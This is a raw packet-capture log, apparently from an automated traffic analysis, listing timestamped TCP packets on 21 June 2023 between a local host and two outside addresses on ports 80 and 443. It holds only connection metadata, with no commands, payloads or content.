                                                                                                  Jun 21, 2023 20:23:45.048352957 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048358917 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:45.048391104 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048430920 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048444986 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:45.048491955 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048532963 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048573017 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048607111 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048612118 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:45.048636913 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048671961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.048682928 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:45.093728065 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:45.106652021 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:45.109261036 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:45.814752102 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:45.815186977 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.121644974 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.121701002 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.122567892 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.122677088 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.124919891 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.165486097 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.165607929 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.165654898 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.165687084 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.165805101 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.165805101 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.188191891 CEST49698443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:46.188221931 CEST44349698162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.711265087 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:46.711337090 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:46.728317022 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.728418112 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.791002035 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.791037083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:46.791131973 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.113945961 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.113945961 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.131030083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.131083965 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.170495033 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.170566082 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.170722008 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.200439930 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.200511932 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207231998 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207288980 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207339048 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207386971 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207427979 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.207436085 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207484007 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207498074 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.207530975 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207571030 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.207576990 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207642078 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207700968 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.207710981 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207763910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207823038 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.207868099 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.208081007 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.241148949 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241209984 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241257906 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241307974 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241354942 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241401911 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241422892 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.241456032 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241506100 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241513014 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.241574049 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241702080 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241719961 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.241777897 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241827011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241835117 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.241877079 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241924047 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241929054 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.241971970 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.241998911 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.242018938 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242065907 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242096901 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.242132902 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242178917 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242225885 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.242225885 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242275000 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242296934 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.242320061 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242360115 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.242568016 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.280162096 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.281296968 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.284282923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284368038 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284415960 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284466028 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284497976 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.284512997 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284553051 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.284559011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284583092 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.284607887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284658909 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284707069 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284729004 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.284756899 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284805059 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284817934 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.284852982 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284900904 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.284951925 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285002947 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.285021067 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285073042 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285120010 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285167933 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285212040 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285228968 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.285259962 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285306931 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285355091 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285357952 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.285403013 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285454035 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285455942 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.285500050 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285542965 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285590887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285605907 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.285640001 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285687923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285734892 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285738945 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.285782099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285830975 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285876989 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285883904 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.285924911 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.285973072 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286019087 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286031008 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.286082983 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286143064 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286190987 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286192894 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.286238909 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286287069 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286334038 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286338091 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.286382914 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286428928 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286478043 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.286480904 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.286521912 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.288633108 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.290667057 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.295604944 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.295630932 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.296053886 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.296483040 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.327830076 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.327883959 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.327953100 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328000069 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328042984 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328062057 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.328114033 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328169107 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.328178883 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328233004 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328300953 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.328358889 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328402996 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328457117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328490019 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328538895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328573942 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.328607082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328661919 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328711987 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328716993 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.328759909 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328807116 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328854084 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328864098 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.328896046 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328943968 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.328993082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329020023 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.329041958 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329090118 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329138041 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329160929 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.329188108 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329236031 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329282999 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329289913 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.329346895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329392910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329442978 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329451084 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.329489946 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329539061 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329585075 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329595089 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.329627037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329688072 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329746008 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.329756975 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329807997 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329854012 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329905033 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329915047 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.329952955 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.329998970 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330045938 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330056906 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.330094099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330142975 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330192089 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330215931 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.330240011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330288887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330338001 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330349922 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.330385923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330447912 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330507994 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330523968 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.330559015 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330591917 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330637932 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330645084 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.330687046 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330732107 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330790997 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330854893 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330914021 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.330926895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.330975056 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331022024 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331068039 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331075907 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.331115961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331161976 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331209898 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331216097 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.331300974 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331348896 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331386089 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331398010 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.331434011 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331480980 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331531048 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.331545115 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331599951 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331646919 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331695080 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331697941 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.331742048 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331789017 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331836939 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331844091 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.331899881 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.331965923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332012892 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332019091 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.332061052 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332108974 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332154036 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332160950 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.332201958 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332247972 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332304001 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.332334995 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332384109 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332418919 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332437038 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.332468987 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332516909 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332566023 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.332567930 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.332614899 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.334184885 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.342006922 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.370099068 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.370153904 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.370202065 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.370243073 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.370284081 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.370474100 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.372780085 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.372833967 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.372883081 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.372931004 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.372940063 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.372978926 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373044968 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373099089 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373145103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373150110 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.373193979 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373243093 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373289108 CEST8049697104.21.18.99192.168.2.4
